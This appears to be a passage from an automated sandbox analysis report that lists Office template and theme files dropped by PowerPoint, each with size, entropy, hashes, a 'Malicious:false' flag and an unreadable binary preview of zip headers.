                                                                                                                              Preview:PK..........AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):8705569
                                                                                                                              Entropy (8bit):7.955490103632122
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:196608:fHnG7lmZcnwldXA4AZwsjVvWJ5u2AbKLCIV50CAmad7uS/5o:u7lVGXA4ABJWJc2A6rkno
                                                                                                                              MD5:476CF35ED8367EB98237B6428266D6D8
                                                                                                                              SHA1:37B320D5109D5FB41044F329187CFECAA8DE2A9C
                                                                                                                              SHA-256:71739BEA66F1DEE0789A7675ADD098123EC0E8E45EB74D707F6412B28FCBAE81
                                                                                                                              SHA-512:7280C51F2DC97871C8B959A971445E1CE1499D108204C025043A0B44E9A9D6AC03E1326BBE652EF2EF900BC6F3F5566A32DBA5AA2EEA6A84F1585323E9C9CAE0
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1623260
                                                                                                                              Entropy (8bit):7.867463315196704
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:bimPI+bGSIB3FKbFGTCpavIOuaR0Um9BbbjE68+xiMNcayWSvHo5R/m:OmPI+6fB3Abk8Q5tHmAsiMNccSvIr/m
                                                                                                                              MD5:126269588DEC71F54D53B563106D0500
                                                                                                                              SHA1:E4E27B005A9728617832F0F2645980CC2CE6EC52
                                                                                                                              SHA-256:0C11107C6CF799125DB9352E2F3A0D2B9ED5D55CBBEAED66D79464058598D94B
                                                                                                                              SHA-512:667F9CA3929926397ED5B43DF4859B8C52973F2603405763308D931C32C4DA831A144ED7041096AFC7CDD291B2978622DED5DD4C16C6BFB0F18235E05B212E5A
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........Z&A........a.......[Content_Types].xml...r.`...[a.:%..R.v..p.gh..$d...^../.[0.e..=d....B...c.._?~._>$..}...2.t]...D.ty...I........._....T.M.I..,..APLo.$,z.,J.wf.<...e>..p.=.G......eZFiyT...8....E...P}y}..,.w;...\]k.....o......9(.E<.....>..I;....|.Lq.g....]..g......~>W.<....0/?.I.....g...U.V..3....l.O........m.l...T.....h.GE.......'K....$...z.E..(.Gc.....N......>...b....Z...Y.f.13k..:af..Y..13...........8L....o...s.....k...l.k....K.Z..i[..7mk...m._........~.../.^...{..Z...r@........P.@.....Z..d....R..e.O..jY.S.,..Z..T-K}....Z-^}.}iyS_C.C}.6.w.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_.....}iyS_C.C}C...*....Y.R..uwY.S.,..Z..T-K}...>U.R..e.O..W..o./-o.kha....N.LP..e.O...,..Z..T-K}...>U.R..e.O..jY....w./-o.kha.odC}#...s"kY....K}...>U.R..e.O..jY.S.,..Z..j.x.....M}.-....P....9..,..\[w..>U.R..e.O..jY.S.,..Z..T-K}.Z..N...M}.-...m.o.`.zNd-K}2...e.O..jY.S.,..Z..T-K}...>U.R_............3..;S0A='...>.k...jY.S.,..Z..T-K}...>U.R..e..V.W.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):562113
                                                                                                                              Entropy (8bit):7.67409707491542
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                              MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                              SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                              SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                              SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1649585
                                                                                                                              Entropy (8bit):7.875240099125746
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                              MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                              SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                              SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                              SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):558035
                                                                                                                              Entropy (8bit):7.696653383430889
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3295051
                                                                                                                              Entropy (8bit):7.9549249539064
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:98304:RMKPrL1cgIF6jyoKfszvzC2UFsp3SUwDyMdghJU:RLPrGgIF6jJKAvO2UAiwU
                                                                                                                              MD5:5978107C3CB2A4A8427E643D0A5587EB
                                                                                                                              SHA1:A3A865B6D128E7C9C5821DF03B9EDFE136F53D17
                                                                                                                              SHA-256:DDCEAEC2A8E652B60CFA4D5D4C7895D70AD25A214D70DE884302C8FE18F53910
                                                                                                                              SHA-512:D9E0B9D52665F4C1E4B6CC32E6DEBA4C0CBC9309728415AC9588DDD84CAD47A90567192D24BF7FF2F5DD7836A559F396B5015ABF3E085ABC9B813FF365388D65
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A.f}......p......[Content_Types].xml..n.@.._......8i.'......}.......(y...H}......3Fi..%.......3..._...j.`.2....cod.(...r...w{s..)...]..3..APF.61...6ug.Y...... 7.....d<..Q.V6.N......{.0.U5...>.-..Ko.nw.f...'.....!.s.=fw.{PaW.. ..82.;.<..os....n....>...w..%....P...v...v....'....m.m..3.[.._...:[,...h..!~s..^..Y..E.....^.9Y.j.....#x......3....=....b}4O.*....k7.+.&.Xg.X.X..XSN.KN.+N.7.X....!..CR....I]...>....L...!=...9..!L.0.v.gEo\.......w..No.a.C.q.}<.........a..n./......e.-)h9a..}i.}.."-..C.C.Xq..0?..M4.........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......4....&T......Wlw.b....}..+.A\...q......~.WK.Z^..........>.h..`......}......k..s.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G.....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ...-Z.>X.2.....>8..S.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G....(.P.'....B\...}..+.A\...q.....~..+.!\-1hyAK.ZV...... ..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):570901
                                                                                                                              Entropy (8bit):7.674434888248144
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):523048
                                                                                                                              Entropy (8bit):7.715248170753013
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                              MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                              SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                              SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                              SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3078052
                                                                                                                              Entropy (8bit):7.954129852655753
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                              MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                              SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                              SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                              SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):777647
                                                                                                                              Entropy (8bit):7.689662652914981
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                              MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                              SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                              SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                              SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):924687
                                                                                                                              Entropy (8bit):7.824849396154325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                              MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                              SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                              SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                              SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):966946
                                                                                                                              Entropy (8bit):7.8785200658952
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                              MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                              SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                              SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                              SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1204049
                                                                                                                              Entropy (8bit):7.92476783994848
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                              MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                              SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                              SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                              SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
